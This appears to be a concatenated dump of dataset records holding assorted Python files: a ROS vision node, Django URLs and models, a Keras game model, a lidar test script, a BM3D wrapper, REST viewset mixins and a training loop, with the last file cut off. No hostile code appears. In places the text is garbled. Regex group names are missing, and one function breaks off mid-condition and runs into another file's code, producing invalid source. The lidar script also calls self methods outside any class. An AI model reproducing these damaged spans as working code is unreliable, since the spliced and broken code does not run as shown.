100:\n\t\t\t\tcontinue\n\t\t\tif cv2.contourArea(c) > largestArea:\n\t\t\t\tlargestArea = cv2.contourArea(c)\n\t\t\t\tlargestRect = cv2.boundingRect(c)\n\t\tif largestArea > 0:\n\t\t\t(x, y, w, h) = largestRect\n\t\t\tcv2.rectangle(cv_image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\t\t\n\t\tcv2.imshow(\"Bucket Detector 2\", cv_image)\n\t\tcv2.waitKey(3)\n\ndef main(args):\n\tic = image_converter()\n\trospy.init_node('bucket_detector', anonymous=True)\n\ttry:\n\t\trospy.spin()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Shut down\")\n\tcv2.destroyAllWindows()\n\nif __name__ == '__main__':\n\tmain(sys.argv)\n","sub_path":"src/buc2.py","file_name":"buc2.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"41683540","text":"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views as lotto_view\n\nurlpatterns = [\n url(r'^$', lotto_view.index, name='index'),\n url(r'^new/$', lotto_view.new , name='new'),\n url(r'^detail/(?P[0-9]+)/$', lotto_view.detail, name='detail'),\n url(r'^update/(?P[0-9]+)/$', lotto_view.update, name='update'),\n url(r'^delete/(?P[0-9]+)/$', lotto_view.delete, name='delete')\n]","sub_path":"lotto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"83045200","text":"# -*- coding: utf-8 -*-\ndef interseção(a,b):\n cont=0\n indice=0\n if len(a) maxSteps):\n return nextWord\n else:\n return crawl(graph, conversation, nextWord, stopProbability, steps + 1,\n maxSteps)\n\n\nclass GraphLearner:\n def __init__(self, graph):\n \"\"\"graph must be an undirected weighted graph of networkx\"\"\"\n self.graph = graph\n return\n\n def getNextWord(self, conversation, word, stopProbability=0.2,\n maxSteps=10):\n return crawl(self.graph, conversation, word, stopProbability, 0,\n maxSteps)\n\n def updateRepresentation(self,\n conversation,\n timestamp,\n maxhistory,\n forgetPercent=1):\n added_edges = 0\n conv = list(conversation)\n for i in range(len(conv)):\n for j in range(i + 1, len(conv)):\n w1 = conv[i]\n w2 = conv[j]\n self.graph.node[w1]['count'] += 1\n self.graph.node[w2]['count'] += 1\n if (w2 not in self.graph.edge[w1]):\n self.graph.add_edge(\n w1, w2, {'weight': 0.0,\n 'count': 1,\n 'time': timestamp})\n added_edges += 1\n else:\n self.graph.edge[w1][w2]['count'] += 1\n self.graph.edge[w1][w2]['time'] = timestamp\n self.graph.graph['count'] += 2\n\n old_edges = []\n for e in self.graph.edges(data=True):\n if (e[2]['time'] < timestamp - maxhistory):\n old_edges.append((e[0], e[1]))\n old_edges = np.array(old_edges)\n r_edges = 0\n if (len(old_edges) > 0):\n removed_edges = old_edges[np.random.choice(\n len(old_edges),\n replace=False,\n size=int((len(old_edges) * forgetPercent) / 100))]\n for e in removed_edges:\n self.graph.graph[\n 'count'] -= self.graph.node[e[0]]['count'] + self.graph.node[e[1]]['count']\n self.graph.node[e[0]]['count'] -= self.graph.edge[e[0]][e[1]][\n 'count']\n self.graph.node[e[1]]['count'] -= self.graph.edge[e[0]][e[1]][\n 'count']\n self.graph.graph[\n 'count'] += self.graph.node[e[0]]['count'] + self.graph.node[e[1]]['count']\n self.graph.remove_edge(e[0], e[1])\n r_edges = len(removed_edges)\n return (added_edges, r_edges)\n\n def updateWeights(self):\n for i in self.graph.edges():\n self.graph.edge[i[0]][i[1]]['weight'] = 2.0 * self.graph.edge[i[\n 0]][i[1]]['count'] / (self.graph.node[i[0]]['count'] +\n self.graph.node[i[1]]['count'])\n return\n\n def getDistanceMatrix(self):\n self.updateWeights()\n return nx.all_pairs_dijkstra_path_length(self.graph)\n\n def getSpectralDistanceMatrix(self, nodes, dimension):\n self.updateWeights()\n subgraphs = list(nx.connected_component_subgraphs(self.graph))\n distances = {}\n for subg in subgraphs:\n subnodes = subg.nodes()\n adjacency = nx.adjacency_matrix(subg, subnodes)\n lower_embedding = sklearn.manifold.spectral_embedding(\n adjacency, n_components=dimension)\n tdistances = {\n subnodes[i]: {\n subnodes[j]: scipy.spatial.distance.euclidean(\n lower_embedding[i], lower_embedding[j])\n for j in range(len(subnodes))\n }\n for i in range(len(subnodes))\n }\n distances.update(tdistances)\n return distances\n\n def getDiffusionDistanceMatrix(self, nodes, dimension=8,\n diffusion_time=10):\n self.updateWeights()\n subgraphs = list(nx.connected_component_subgraphs(self.graph))\n print(\"Number of components = {:d}\".format(len(subgraphs)))\n distances = {}\n for subg in subgraphs:\n subnodes = subg.nodes()\n geom = gm.Geometry()\n geom.set_affinity_matrix(nx.adjacency_matrix(subg, subnodes))\n geom.set_laplacian_matrix(\n nx.normalized_laplacian_matrix(subg, subnodes))\n lower_embedding = sp.spectral_embedding(\n geom,\n n_components=dimension,\n drop_first=True,\n diffusion_maps=True,\n diffusion_time=diffusion_time)\n tdistances = {\n subnodes[i]: {\n subnodes[j]: euclidean_distance(lower_embedding[i],\n lower_embedding[j])\n for j in range(len(subnodes))\n }\n for i in range(len(subnodes))\n }\n distances.update(tdistances)\n return distances\n","sub_path":"src/forTest_Shenglong/graph_learner.py","file_name":"graph_learner.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"566933057","text":"#TestError Exception.\nfrom PythonTests.Tests.Errors import TestError\n\n#RPC class.\nfrom PythonTests.Meros.RPC import RPC\n\n#Verify the Send Difficulty.\ndef verifySendDifficulty(\n rpc: RPC,\n sendDiff: bytes\n) -> None:\n if rpc.call(\"consensus\", \"getSendDifficulty\") != sendDiff.hex().upper():\n raise TestError(\"Send Difficulty doesn't match.\")\n\n#Verify the Data Difficulty.\ndef verifyDataDifficulty(\n rpc: RPC,\n dataDiff: bytes\n) -> None:\n if rpc.call(\"consensus\", \"getDataDifficulty\") != dataDiff.hex().upper():\n raise TestError(\"Data Difficulty doesn't match.\")\n","sub_path":"PythonTests/Tests/Consensus/Verify.py","file_name":"Verify.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263068266","text":"from typing import *\nimport time\nimport datetime\nfrom collections import deque\nimport hashlib\nimport json\nimport os\nfrom logging import getLogger\nimport numpy as np\nfrom tqdm import tqdm, trange\n# noinspection PyPep8Naming\nimport keras.backend as K\nfrom keras.engine.topology import Input\nfrom keras.engine.training import Model\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.core import Activation, Dense, Flatten\nfrom keras.layers.merge import Add\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.losses import mean_squared_error\nfrom keras.optimizers import Adam, SGD\nfrom keras.regularizers import l2\n\nfrom .config import Config, QLearnConfig\nfrom game.game_state import GameState, Winner\n\n\nlogger = getLogger(__name__)\n\ndef objective_function_for_policy(y_true, y_pred):\n # can use categorical_crossentropy??\n return K.sum(-y_true * K.log(y_pred + K.epsilon()), axis=-1)\n\n\ndef objective_function_for_value(y_true, y_pred):\n return mean_squared_error(y_true, y_pred)\n\n\ndef update_learning_rate(self, total_steps):\n # The deepmind paper says\n # ~400k: 1e-2\n # 400k~600k: 1e-3\n # 600k~: 1e-4\n\n lr = self.decide_learning_rate(total_steps)\n if lr:\n K.set_value(self.optimizer.lr, lr)\n logger.debug(f\"total step={total_steps}, set learning rate to {lr}\")\n\n\nclass ModelZero:\n\n def __init__(self, config: Config) -> None:\n self.config = config\n self.digest = None\n\n def build(self) -> None:\n mc = self.config.model\n in_x = x = Input((2, 7, 5))\n\n x = Conv2D(filters=mc.cnn_filter_num, kernel_size=mc.cnn_filter_size, padding=\"same\",\n data_format=\"channels_first\", kernel_regularizer=l2(mc.l2_reg))(x)\n x = BatchNormalization(axis=1)(x)\n x = Activation(\"relu\")(x)\n\n for _ in range(mc.res_layer_num):\n x = self._build_residual_block(x)\n\n res_out = x\n # for policy output\n x = Conv2D(filters=2, kernel_size=1, data_format=\"channels_first\",\n kernel_regularizer=l2(mc.l2_reg))(res_out)\n x = BatchNormalization(axis=1)(x)\n x = Activation(\"relu\")(x)\n x = Flatten()(x)\n # no output for 'pass'\n policy_out = Dense(315, kernel_regularizer=l2(mc.l2_reg),\n activation=\"softmax\", name=\"policy_out\")(x)\n\n x = Dense(mc.value_fc_size, kernel_regularizer=l2(mc.l2_reg),\n activation=\"relu\")(x)\n value_out = Dense(1, kernel_regularizer=l2(mc.l2_reg),\n activation=\"tanh\", name=\"value_out\")(x)\n\n self.model = Model(in_x, [policy_out, value_out], name=\"slipe_model\")\n self.compile_model()\n self.model.summary()\n\n def compile_model(self):\n self.optimizer = SGD(lr=1e-2, momentum=0.9)\n losses = [objective_function_for_policy, objective_function_for_value]\n self.model.compile(optimizer=self.optimizer, loss=losses)\n\n def _build_residual_block(self, x):\n mc = self.config.model\n in_x = x\n x = Conv2D(filters=mc.cnn_filter_num, kernel_size=mc.cnn_filter_size, padding=\"same\",\n data_format=\"channels_first\", kernel_regularizer=l2(mc.l2_reg))(x)\n x = BatchNormalization(axis=1)(x)\n x = Activation(\"relu\")(x)\n x = Conv2D(filters=mc.cnn_filter_num, kernel_size=mc.cnn_filter_size, padding=\"same\",\n data_format=\"channels_first\", kernel_regularizer=l2(mc.l2_reg))(x)\n x = BatchNormalization(axis=1)(x)\n x = Add()([in_x, x])\n x = Activation(\"relu\")(x)\n return x\n\n # 重みの学習\n def replay(self, wps, pi_mcts, board_logs, plus_turns, batch_size: int, beta: float) -> None:\n inputs = np.zeros((batch_size, 2, 7, 5))\n policy_true = np.zeros((batch_size, 315))\n values_true = np.zeros((batch_size)) \n indices = np.random.choice(\n np.arange(len(wps)), size=batch_size, replace=False)\n mini_batch = [(wps[i], pi_mcts[i], board_logs[i], plus_turns[i]) for i in indices]\n\n for i, (winner, pi, board, plus_turn) in enumerate(mini_batch):\n gs = GameState()\n gs.board = board\n inputs[i] = gs.to_inputs(flip=not plus_turn) # shape=(4, 5, 5)\n policy_true[i] = pi ** beta\n values_true[i] = winner\n\n # epochsは訓練データの反復回数、verbose=0は表示なしの設定\n self.model.fit(inputs, [policy_true, values_true], epochs=1, verbose=0)\n\n\n @staticmethod\n def fetch_digest(weight_path: str):\n if os.path.exists(weight_path):\n m = hashlib.sha256()\n with open(weight_path, \"rb\") as f:\n m.update(f.read())\n return m.hexdigest()\n\n def load(self, config_path: str, weight_path: str) -> bool:\n if os.path.exists(weight_path): # os.path.exists(config_path) and\n logger.debug(f\"loading model from {config_path}\")\n with open(config_path, \"rt\") as f:\n self.model = Model.from_config(json.load(f))\n self.model.load_weights(weight_path)\n self.model.compile(loss='mse',\n optimizer=Adam(lr=self.config.model.learning_rate))\n self.model.summary()\n self.digest = self.fetch_digest(weight_path)\n logger.debug(f\"loaded model digest = {self.digest}\")\n return True\n else:\n logger.debug(\n f\"model files does not exist at {config_path} and {weight_path}\")\n return False\n\n def save(self, config_path: str, weight_path: str) -> None:\n logger.debug(f\"save model to {config_path}\")\n with open(config_path, \"wt\") as f:\n json.dump(self.model.get_config(), f)\n self.model.save_weights(weight_path)\n self.digest = self.fetch_digest(weight_path)\n logger.debug(f\"saved model digest {self.digest}\")\n","sub_path":"agent/model_zero.py","file_name":"model_zero.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"578873980","text":"'''\n#-----------------!!NOTICE!!-----------------#\nYOU NEED CAPACITORS TO POWER THE LIDAR\n\nThis is really important since you can do \nsome real damage to the devine your testing with\nbecause it does not consistantly draw power.\n\nCapacitance: 500 <= uC <= 1000\nCapacitanc on Website: 680uC\n\nWires Used: Red, Black, Green, Blue\n\n----SETUP----\n\nSINGLE CAPACITOR:\nThe 5v\n\nAssume . is an unused pin hole.\n+ is positive current input\n- is negative current input\nX is capacitor\nL is lidar\nIN is input power\n\nIN+ . . . . . X+ . . . . . L+\nIN- . . . . . X- . . . . . L-\n\nCAPACITORS IN PARALLEL:\n\nAssume . is an unused pin hole.\n+ is positive current input\n- is negative current input\nX is capacitor\nL is lidar\nIN is input power\nW# is wire connections (W1+ -> W1+)\n\nIN+ . . . . . . . W2+ . . . . L+\nIN- . . . . . . . W2- . . . . L-\n----------------------------------\n. W1+ . . . W2+ . . . . .\n. . . . . W1+ . . . . . \n. X+ . . . X+ . . . . . \n. X- . . . X- . . . . . \n. . . . . W2- . . . . . \n. W1- . . . W1- . . . . .\n\nConnect positive leads for capacitors to eachother\nConnect negative leads for capacitors to eachother\nPower goes into the first capacitor's positive lead\n and fed back from the last capacitor's positive lead\nGround goes into the first capacitor's negative lead\n and fed back from the last capacitor's negative lead\n \nRASPBERRY PI WIRING\n\nThe odd pin numbers are the top row starting from\nthe right side closes to the power and increases to\nthe left with the farthest pin being closest to the\nUSB ports. Here is the Pinout:\n\nRed: 6 Black: 4 Blue: 3 Green: 5\n\nuse sudo i2cdetect -y 1 to verify if it is connected\ncorrectly. \n\nPLEASE READ, values inside the DIGITALOUTPUTDEVICE is the\nGPIO pin numbers, NOT actual pin number!! (i.e.\nGPIO 26 = pin 37\nGPIO 19 = pin 35\nGPIO 13 = pin 33\nGPIO 6 = pin 31\n)\n\n#--------------------------------------------#\n'''\nfrom lidar_lite import Lidar_Lite\nfrom time import sleep\nfrom gpiozero import DigitalOutputDevice \n\nlidarController = [ DigitalOutputDevice(26), \n DigitalOutputDevice(19),\n DigitalOutputDevice(13),\n DigitalOutputDevice(6) ]\n\nlidar = Lidar_Lite()\n\nconnected = lidar.connect(1)\n\nif connected < -1:\n print(\"Not Connected\")\n\nif __name__ == \"__main__\":\n print(\"Starting Test\")\n while True:\n for i in range(0,4):\n if i == 0:\n lidarController[3].off()\n else:\n lidarController[i-1].off()\n lidarController[i].on()\n if i == 0:\n self.getFR()\n elif i == 1:\n self.getFL()\n elif i == 2:\n self.getBL()\n elif i == 3:\n self.getBR()\n print( str(i) + \" \" + str(lidarController[i].value))\n \n j = 0\n while j != 50:\n try:\n print(\"Distance: \"+ str(i) + \" \" + str(lidar.getDistance()))\n sleep(0.01)\n except:\n print(\"\\tRemote I/O Error Occur, Check connection\")\n sleep(0.01)\n j += 1\n\ndef getFR():\n print(\"FRONT RIGHT\")\n return lidar.getDistance()\n\ndef getFL():\n print(\"FRONT LEFT\")\n return lidar.getDistance()\n\ndef getBL():\n print(\"BACK LEFT\")\n return lidar.getDistance()\n\ndef getBR():\n print(\"BACK RIGHT\")\n return lidar.getDistance()\n","sub_path":"2018-2019/Testing/LidarTesting/lidarPinController.py","file_name":"lidarPinController.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"402154236","text":"import pry\n\n#open file\nwith open('gcodesano/cube.gcode') as f:\n content = f.readlines()\n\n#example\ncontent[0] = \"ciao\\n\"\n\n\n#save the file\nthefile = open('cube.gcode', 'w')\nfor item in content:\n thefile.write(item)\n","sub_path":"test.app/Contents/Resources/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170332294","text":"\"\"\"\nGrayscale BM3D denoising demo file, based on Y. Mäkinen, L. Azzari, A. Foi, 2019.\nExact Transform-Domain Noise Variance for Collaborative Filtering of Stationary Correlated Noise.\nIn IEEE International Conference on Image Processing (ICIP), pp. 185-189\n\"\"\"\n\nimport sys\nsys.path.insert(0,'../src') # wrt runDemo.sh\n\nimport numpy as np\nfrom PIL import Image\nfrom bm3d import bm3d, BM3DProfile\n#from experiment_funcs import get_experiment_noise, get_psnr, get_cropped_psnr\nimport getopt, sys \n\nimport matplotlib\nmatplotlib.use('Agg') #for display on remote node\nimport matplotlib.pyplot as plt\n\ndef read_image_3D(fname_base, FirstSliceNumber, SliceNumDigits, Nz, Ny, Nx):\n image = np.zeros((Nz, Ny, Nx), dtype=np.float32)\n for i in range(Nz):\n fname = '%s_slice%0*d.2Dimgdata' % (fname_base, SliceNumDigits, FirstSliceNumber+i)\n f = open(fname, 'rb')\n data = np.fromfile(f, ' -l -u -s \\\n -z -y -x -i -d \\n\") \n \n elif opt in (\"-f\", \"--FileName\"): \n fname_base = arg\n\n elif opt in (\"-l\", \"--LowerBound\"):\n LowerBound = float(arg)\n\n elif opt in (\"-u\", \"--UpperBound\"):\n UpperBound = float(arg)\n\n elif opt in (\"-s\", \"--Sigma_n\"):\n Sigma_n = float(arg)/255.0 \n\n elif opt in (\"-z\", \"--Nz\"):\n Nz = int(arg) \n\n elif opt in (\"-y\", \"--Ny\"):\n Ny = int(arg)\n\n elif opt in (\"-x\", \"--Nx\"):\n Nx = int(arg) \n\n elif opt in (\"-i\", \"--FirstSliceNumber\"):\n FirstSliceNumber = int(arg)\n\n elif opt in (\"-d\", \"--NumSliceDigits\"):\n SliceNumDigits = int(arg) \n \n except getopt.error as err: \n # output error, and return with an error code \n print (str(err)) \n\n return fname_base, LowerBound, UpperBound, Sigma_n, Nz, Ny, Nx, FirstSliceNumber, SliceNumDigits\n\ndef main():\n # Experiment specifications\n argumentList = sys.argv[1:] \n filename_base, vl, vh, Sigma_n, Nz, Ny, Nx, FirstSliceNumber, SliceNumDigits = read_cmdline(argumentList)\n\n # read image\n image_noisy=read_image_3D(filename_base+'_in', FirstSliceNumber, SliceNumDigits, Nz, Ny, Nx)\n\n #denoise\n image_clean = bm3d_denoise_slicewise(image_noisy, FirstSliceNumber, SliceNumDigits, Sigma_n, vl, vh) \n\n #display images\n #display_image_3D(image_noisy, filename_base+'_noisy', FirstSliceNumber, SliceNumDigits)\n #display_image_3D(image_clean, filename_base+'_clean', FirstSliceNumber, SliceNumDigits)\n\n #write image \n write_image_3D(image_clean, filename_base+'_out', FirstSliceNumber, SliceNumDigits)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"src/bm3d_wrapper.py","file_name":"bm3d_wrapper.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569338734","text":"from Bio import SeqIO\nfrom Bio.Alphabet import generic_dna\nfrom get_data import *\n\ncategories = {0:\"archea\", 1:\"bact\", 2:\"euk\", 3:\"viruses\"}\noutput = open(\"15000contigs_gi_pos_cat\", 'w')\npattern = '11011'\n\nfor i in categories.keys():\n with open(categories[i] + \"_\" + pattern, 'w') as output:\n with open(categories[i] + \"_15000contigs.bfast.fastq\", 'r') as file:\n records = SeqIO.parse(file, \"fastq\")\n id = 0\n second_read = False\n for r in records:\n if not second_read:\n seq = str(r.seq)\n vect = kmerize(seq, pattern, 1000)\n feat = print_vw_features(id, vect, i)\n output.write(feat)\n id += 1\n second_read = not second_read\n","sub_path":"python/gen_vw_files.py","file_name":"gen_vw_files.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"584484737","text":"import os\nimport unittest,argparse\nfrom user import server\n\ndef arg_parse():\n '''\n 解析命令行参数\n :return:\n '''\n # 初始化一个参数解析器\n parser = argparse.ArgumentParser(description=\"command args parser\")\n\n # user server port\n parser.add_argument(\n \"--port\",\n nargs=\"?\",\n default=50050,\n type=int,\n help=\"server port\"\n )\n # 对命令行参数进行解析,并返回一个参数对象\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n\n\n args = arg_parse()\n server.serve(args.port)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150579849","text":"#! /usr/bin/env python3\n\n# <>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <>\n\nfrom PoPs import database as databaseModule\n\nfOut = open( 'Outputs/copyDBs.py.copy.out', 'w' )\n\ndef _copy( fileName ) :\n\n fIn = open( fileName )\n fOut.writelines( fIn.readlines( ) )\n fIn.close( )\n\n database1 = databaseModule.read( fileName )\n database2 = database1.copy( )\n print( database2.toXML( ) )\n\n_copy( 'Answers/database.py.out' )\n_copy( 'Answers/database3.py.out' )\n_copy( 'Answers/database4.py.out' )\n\nfOut.close( )\n","sub_path":"PoPs/Test/copyDBs.py","file_name":"copyDBs.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387394930","text":"import torch\n\n\ndef train_val_loop(model, epochs:int, train_loader, val_loader, optimizer, criterion, loss_train:list, task:int, bs:int, device, scheduler=None):\n \"\"\"\n This function will perform train loop (forward-backward pass) and also evaluate performance \n on validation data after each epoch of training. Finally losses will be printed out.\n Return:\n It returns two list containing training and validation loss\n Args:\n model: neural network model to be train\n epochs: number of epochs(times) train the model over complete train data set\n train_loader: data loader for train set\n val_loader: data loader for validation set\n optimizer: optimizer to update model parameters\n criterion: loss function to evaluate the training through loss\n task: define for which part loop is performed and save the model and results in path for that task\n bs: batch size (number of images grouped in a batch)\n device: device to which tensors will be allocated (in our case, from gpu 0 to 7)\n scheduler: update the learning rate based on chosen scheme if provided\n \"\"\"\n # store the losses after every epoch \n loss_train = []\n loss_val = []\n \n for epoch in range(epochs):\n #Training\n model.train()\n running_loss = 0\n\n for i, samples in enumerate(train_loader):\n inputs = samples['image'].to(device)\n labels = samples['label'].to(device).long()\n # labels = labels.squeeze(1\n optimizer.zero_grad()\n outputs = model(inputs)\n\n loss = criterion(outputs, labels)\n\n loss.backward()\n optimizer.step()\n ###accumulating loss for each batch\n running_loss += loss.item()\n \n if scheduler:\n # changing LR\n scheduler.step()\n\n if i%60 == 0: # intermediate progress printing\n print(\"epoch{}, iter{}, running loss: {}\".format(epoch, i, running_loss/(bs*(i+1))))\n\n loss_train.append(running_loss/len(train_loader))\n\n print(\"epoch{}, Training loss: {}\".format(epoch, running_loss/len(train_loader)))\n torch.save(model.state_dict(), f'../weights/T{task}/epoch_{epoch}.pth')\n\n #Validation\n model.eval()\n running_loss_val = 0\n for i, samples in enumerate(val_loader):\n inputs = samples['image'].to(device)\n labels = samples['label'].to(device).long()\n # labels = labels.squeeze(1)\n\n with torch.no_grad(): \n outputs = model(inputs)\n # loss = criterion(outputs,labels.long())\n loss = criterion(outputs,labels)\n\n ###accumulating loss for each batch\n running_loss_val += loss.item()\n\n\n #if i%10 == 0:\n loss_val.append(running_loss_val/len(val_loader))\n print(\"epoch{}, Validation loss: {}\".format(epoch, running_loss_val/len(val_loader)))\n \n return loss_train, loss_val\n\n\n","sub_path":"utils/.ipynb_checkpoints/learn-checkpoint.py","file_name":"learn-checkpoint.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"419852121","text":"import glob\nfrom lxml import etree\nimport os\n\nfor filename in glob.glob(\"*/menu.xml\"):\n\tprint(filename)\n\tfolder = filename.split(\"/\")[0]\n\ttree = etree.parse(filename)\n\tfor item in tree.xpath(\"//menuitem\"):\n\t\tif not os.path.isfile(os.path.join(folder, item.attrib.get(\"doc\"))):\n\t\t\tprint(os.path.join(folder, item.attrib.get(\"doc\")))\n\n\n","sub_path":"android_prayer_book/app/src/main/assets/prayers/check_menu.py","file_name":"check_menu.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"381013086","text":"from django.db import models\n\nfrom teams.models import Team\nfrom tournaments.models import Group, Tournament\n\nSCHEDULED = \"scheduled\"\nFIRST_HALF = \"first half\"\nHALF_TIME = \"half time\"\nSECOND_HALF = \"second half\"\nEXTRA_FIRST_HALF = \"extra first half\"\nEXTRA_SECOND_HALF = \"extra second half\"\nEXTRA_HALF_TIME = \"extra half time\"\nTIE_BREAKER = \"tie breaker\"\nOVER = \"over\"\nABANDONED = \"abandoned\"\n\n\nMATCH_STATUS_CHOICES = (\n (SCHEDULED, \"scheduled\"),\n (FIRST_HALF, \"first half\"),\n (HALF_TIME, \"half time\"),\n (SECOND_HALF, \"second half\"),\n (EXTRA_FIRST_HALF, \"extra first half\"),\n (EXTRA_SECOND_HALF, \"extra second half\"),\n (EXTRA_HALF_TIME, \"extra half time\"),\n (TIE_BREAKER, \"tie breaker\"),\n (OVER, \"over\"),\n (ABANDONED, \"abandoned\")\n)\n\nHOME_WIN = \"home win\"\nAWAY_WIN = \"away win\"\nDRAW = \"draw\"\n\nMATCH_RESULT_CHOICES = (\n (HOME_WIN, \"home win\"),\n (AWAY_WIN, \"away win\"),\n (DRAW, \"draw\")\n)\n\n\nclass Match(models.Model):\n \"\"\"\n Model representing a football team.\n \"\"\"\n tournament = models.ForeignKey(\n Tournament,\n null=True,\n on_delete=models.SET_NULL\n )\n group = models.ForeignKey(Group, null=True, on_delete=models.SET_NULL)\n kickoff = models.DateTimeField(null=True)\n home_team = models.ForeignKey(\n Team,\n null=True,\n on_delete=models.SET_NULL,\n related_name='home_team'\n )\n away_team = models.ForeignKey(\n Team,\n null=True,\n on_delete=models.SET_NULL,\n related_name='away_team'\n )\n status = models.CharField(\n max_length=32,\n choices=MATCH_STATUS_CHOICES,\n default=SCHEDULED\n )\n home_team_goals = models.PositiveSmallIntegerField(default=0)\n away_team_goals = models.PositiveSmallIntegerField(default=0)\n result = models.CharField(\n max_length=32,\n choices=MATCH_RESULT_CHOICES,\n default=DRAW\n )\n\n\nclass MatchPhoto(models.Model):\n description = models.CharField(max_length=1024, default='')\n photo = models.ImageField(upload_to=\"photos/matches\")\n match = models.ForeignKey(Match, on_delete=models.CASCADE)\n","sub_path":"matches/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471098864","text":"from django.http.response import Http404\nfrom rest_framework import mixins, status\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\n\nclass MultiNestedMixinHelper():\n def get_multi_nested_filter(self, parent, filter_dict, limit_count):\n try:\n if parent.parent_lookup_field or limit_count < 0:\n limit_count = limit_count - 1\n identifier = '{0}_{1}'.format(parent.parent_lookup_field, parent.lookup_field)\n identifier_pk = self.kwargs[identifier]\n parent_object = parent.parent_object.objects.get(**{parent.parent.lookup_field:identifier_pk})\n filter_dict.update({parent.parent_lookup_field:parent_object})\n self.get_multi_nested_filter(parent.parent, filter_dict, limit_count)\n return filter_dict\n except AttributeError:\n return filter_dict\n except:\n raise Http404\n\n\nclass MultiNestedCreateModelMixin(mixins.CreateModelMixin, MultiNestedMixinHelper):\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def perform_create(self, serializer):\n filter_dict = self.get_multi_nested_filter(self, {}, 20)\n serializer.save(**filter_dict)\n\n\nclass MultiNestedUpdateModelMixin(object, MultiNestedMixinHelper):\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', False)\n filter_dict = self.get_multi_nested_filter(self, {}, 20)\n pk = kwargs.get('pk', None)\n if pk is not None:\n filter_dict.update({'pk': pk})\n instance = self.filter_queryset(self.get_queryset().filter(**filter_dict))\n if len(instance) < 1:\n raise Http404\n serializer = self.get_serializer(instance[0], data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n self.perform_update(serializer)\n return Response(serializer.data)\n\n def perform_update(self, serializer):\n serializer.save()\n\n def partial_update(self, request, *args, **kwargs):\n kwargs['partial'] = True\n return self.update(request, *args, **kwargs)\n\n\nclass MultiNestedListModelMixin(object, MultiNestedMixinHelper):\n def list(self, request, *args, **kwargs):\n filter_dict = self.get_multi_nested_filter(self, {}, 20)\n queryset = self.filter_queryset(self.get_queryset().filter(**filter_dict))\n\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass MultiNestedModelViewSet(MultiNestedCreateModelMixin,\n mixins.RetrieveModelMixin,\n MultiNestedUpdateModelMixin,\n MultiNestedListModelMixin,\n mixins.DestroyModelMixin,\n GenericViewSet):\n pass","sub_path":"common/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"327463926","text":"import torch\nimport sbi.utils as utils\n\nfrom sbi.inference import SNPE, prepare_for_sbi, SNLE, SNRE\n\nimport time\n\nimport pickle\nfrom multiprocessing import cpu_count\nimport subprocess as sp\nimport os\nimport sbi.utils as utils\n\nsim_iterations=10000 #3 minimum\nsim_method=\"SNPE\" #SNPE, SNLE, SNRE\nuse_CUDA=False\nobserve=True\nsave_posterior=False\nshutdown=False\n\ndef get_gpu_memory():\n _output_to_list = lambda x: x.decode('ascii').split('\\n')[:-1]\n\n #ACCEPTABLE_AVAILABLE_MEMORY = 1024\n COMMAND = \"nvidia-smi --query-gpu=memory.free --format=csv\"\n memory_free_info = _output_to_list(sp.check_output(COMMAND.split()))[1:]\n memory_free_values = [int(x.split()[0]) for i, x in enumerate(memory_free_info)]\n print(memory_free_values)\n return memory_free_values\n\ndef pickler(path,obj):\n outfile = 